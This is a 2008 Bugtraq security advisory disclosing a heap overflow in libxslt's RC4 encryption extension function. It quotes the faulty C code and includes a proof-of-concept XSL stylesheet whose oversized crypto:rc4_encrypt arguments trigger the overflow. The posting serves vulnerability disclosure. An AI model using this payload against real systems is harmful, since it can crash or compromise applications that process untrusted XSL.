[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0808010202190.5355@sphinx.mythic-beasts.com>
Date: Fri, 1 Aug 2008 02:03:11 +0100 (BST)
From: chris@...ry.beasts.org
To: bugtraq@...urityfocus.com
Subject: libxslt heap overflow
Hi,
A heap overflow exists in libxslt when processing a crypto-related
built-in function.
Full technical details:
http://scary.beasts.org/security/CESA-2008-003.html
The faulty code can be summarized:
static void
exsltCryptoRc4EncryptFunction (xmlXPathParserContextPtr ctxt, int nargs) {
...
key = xmlXPathPopString (ctxt);
key_len = xmlUTF8Strlen (str);
...
padkey = xmlMallocAtomic (RC4_KEY_LENGTH);
key_size = xmlUTF8Strsize (key, key_len);
memcpy (padkey, key, key_size);
memset (padkey + key_size, '\0', sizeof (padkey));
...
A statically-sized heap buffer is populated with an arbitrary-length
string from an incoming XSL function argument.
And the malicious XSL to trigger this:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:str="http://exslt.org/strings"
xmlns:crypto="http://exslt.org/crypto"
xmlns:math="http://exslt.org/math"
extension-element-prefixes="str crypto math">
<xsl:template match="/">
<xsl:value-of
select="crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')"/>
blah
</xsl:template>
</xsl:stylesheet>
Blog post for this, and future issues (with RSS):
http://scarybeastsecurity.blogspot.com/2008/07/buffer-overflow-in-libxslt.html
http://scarybeastsecurity.blogspot.com/
Cheers
Chris
Powered by blists - more mailing lists